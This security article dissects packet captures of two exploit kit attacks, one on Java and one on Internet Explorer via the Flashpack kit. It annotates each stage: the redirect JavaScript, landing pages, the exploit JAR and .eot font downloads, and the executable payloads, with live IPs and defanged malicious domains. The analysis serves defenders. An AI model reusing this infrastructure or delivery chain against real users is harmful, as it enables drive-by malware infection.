Detailed Analysis of the processes and stages of an Exploit Kit - Java and IE exploited by Flashpac

2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394 E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1 Host: web63.server77.publicompserver.de User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472 E…_…….\+lF..j..P..X.X.7_\

P…D…HTTP/1.1 200 OK Date: Wed, 19 Sep 2012 02:41:54 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT ETag: “894002-47-4ca04cfa1a5c0? Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript

document.location=’http://69.194.193.34/links/systems-links_warns.php'; <— The Javascript file simple contains a document.location variable that redirects the user to the landing page of the exploit kit

Redirection to the landing page, note that the referer below is the same link the Javascript had coded in it

2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539 E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1 Host: 69.194.193.34 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://69.194.193.34/links/systems-links_warns.php The victim is instructed to request the file “java.jar” which is a Java archive file containing the exploit for the vulnerable version of Java (1.7.0_06) 2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273 E..9*a@….M..j.E..”…P.?.GA.*.P…….GET /data/java.jar HTTP/1.1 accept-encoding: pack200-gzip, gzip content-type: application/x-java-archive <— MIME TYPE User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06 <— Vulnerable version of Java Host: 69.194.193.34 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive 2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233 E…`#……E..”..j..P..A.*..?.XP…;3..HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 19 Sep 2012 02:42:01 GMT Content-Type: application/java-archive Connection: keep-alive Content-Length: 33010 Last-Modified: Tue, 18 Sep 2012 07:17:22 GMT Accept-Ranges: bytes

So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered, how do we know the exploit kit did its job?

Below is the proof in the pudding, this is the request for a malicious executable file, we know that because there is no longer a referer in the GET request, the User-Agent will still be for Java and lastly the “accept-encoding: pack200-gzip, gzip” will not be in the request for the malicious file.

2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263 E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.php?vf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1 <—- Pointer on the exploit kit server to an executable file (the GET request does not have to have .exe or .zip or anything of the sorts in it for it to be an executable request, it simply points to a location on the server.

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06

Host: 69.194.193.34

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

To confirm, we look at the servers response to the clients request:

2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460 E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 19 Sep 2012 02:42:05 GMT Content-Type: application/x-msdownload Connection: keep-alive Content-Length: 131584 X-Powered-By: PHP/5.3.14-1~dotdeb.0 Pragma: public Expires: Wed, 19 Sep 2012 02:42:04 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename=”contacts.exe” <—– There it is, the GET request resulted in the download of a file named “contacts.exe” Content-Transfer-Encoding: binary

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

To summarize, at this point the exploit kit was able to successfully exploit the victims machine because it was able to make it download a file without the users consent by exploiting a vulnerability in Java that allowed a break out from the sandbox and onto the victims machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus could have easily stopped it or another host based prevention system. The file may not have even been able to install properly.

Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability

In this scenario, the victim is using Google Translate service to view a website, the website “hitcric.info” is a legitimate website hosting live Cricket (the sport) games that has been hacked.

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429 E…..@….,….Y.f”…P@HD.3.:[P….k..GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Host: hitcric[.]info Connection: Keep-Alive

2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519 E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily <—- The hackers have taken over the domain name and forwarded it to a web-based exploit kit, note the “Location:” pointer Server: nginx admin Date: Mon, 19 May 2014 02:13:42 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php? s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==

The victim has now hit what is known as the “landing page”

2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605 E….’@………_..Z…P’.=.n.~cP…….GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878 E………c2_..Z…..P..n.~c’.@.P…e…HTTP/1.1 200 OK Server: nginx/1.4.3 Date: Mon, 19 May 2014 02:27:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:01 +0000 Content-Encoding: gzip Vary: Accept-Encoding PASSES BROWSER INFORMATION BACK TO EXPLOIT KIT BELOW WITH THE GET REQUEST FOR “json.php”

2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699 E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com Content-Length: 207 Connection: Keep-Alive Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d 2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0 E..(……fk_..Z…..P..n.9.’.G.P….d…….. 2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584 E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OK Server: nginx/1.4.3 Date: Mon, 19 May 2014 02:27:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.3.3 Sends the Internet Explorer exploit in a font file .eot which is in a binary file format, note the large content length

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285 E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com Connection: Keep-Alive 2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268 E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OK Server: nginx/1.4.3 Date: Mon, 19 May 2014 02:27:48 GMT Content-Type: application/octet-stream <—- MIME type for a binary file Content-Length: 22319

First exploit appears to have failed, here is another exploit attempt with a different exploit for Internet Explorer: 2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156 E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1 Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0 E..(.+….f(_..Z…..P..g^.dcS&.P…O5…….. 2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268 E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OK Server: nginx/1.4.3 Date: Mon, 19 May 2014 02:27:52 GMT Content-Type: application/octet-stream Content-Length: 13312 Connection: keep-alive Last-Modified: Mon, 19 May 2014 02:25:29 GMT ETag: “53796b99-3400? Accept-Ranges: bytes

tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[\.KLW.PW.}vj.TV]\.443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..?C.._C…C.._CkPZQ.._C9999999999999999i

99u8=9..;q99999999.97.28>39.9991999999 +999)999y9999P`9)999;99<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A;99.9999)99.999999999999999999999999999.M\AM999..999)999.999=99999999999999.99Y.]XMX999)9999y999;999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.K\UVZ99.8999Y999;999.99999999999999y99{..;q.999..;qz999..;qi989..;qd999?.;q^999(.;qK99999999999TJOZKM.]UU9x}oxip ..]UU9r

kw

u ..]UU9wm}uu.}uu9lj

k ..]UU9jq

uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

BOOM……this exploit has succeeded, the GET request for “loadsilver.php” is actually a pointer to a place on the exploit kit server for the file “e53796b9e8cb041400466334.exe” and as you can see below, another successful exploitation. Note: There is no discussion of malware here because there is no “callback” and in this example the executable fails to install properly as anti-virus quarantined the executable upon download (not that you could see that from network traffic). 2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342 E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0 E..(.?….f._..Z…..P..)m..@)i!P…0……… 2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268 E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK Server: nginx/1.4.3 Date: Mon, 19 May 2014 02:27:53 GMT Content-Type: application/octet-stream Content-Length: 94514 Connection: keep-alive X-Powered-By: PHP/5.3.3 Accept-Ranges: bytes Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

Find more great Cyber Security Articles, Information, Education, Certifications, Vulnerabilities and Guides at Computer Security.org

Related Articles - Computer, Cyber Security, Computer Security, Network Security, Internet Security, Malware, Adware, Spyware, Viruses, Exploit Kit, Denial of Service,

Email this Article to a Friend! Receive Articles like this one direct to your email box! Subscribe for free today!